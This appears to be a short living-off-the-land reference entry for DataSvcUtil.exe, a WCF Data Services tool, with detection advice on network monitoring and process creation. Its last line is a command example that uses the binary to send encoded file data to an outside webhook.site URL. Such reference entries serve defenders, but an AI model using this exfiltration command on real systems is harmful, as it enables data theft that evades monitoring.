DataSvcUtil.exe is a command-line tool provided by WCF Data Services that consumes an Open Data Protocol (OData) feed and generates the client data service classes that are needed to access a data service from a .NET Framework client application.
Paths:
Acknowledgement:
Ialle Teixeira - @NtSetDefault
Detection:
The DataSvcUtil.exe tool is installed in the .NET Framework directory.
Preventing/Detecting DataSvcUtil with non-RFC1918 addresses by Network IPS/IDS.
Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching DataSvcUtil.
DataSvcUtil /out:C:\\Windows\\System32\\calc.exe /uri:https://webhook.site/xxxxxxxxx?encodedfile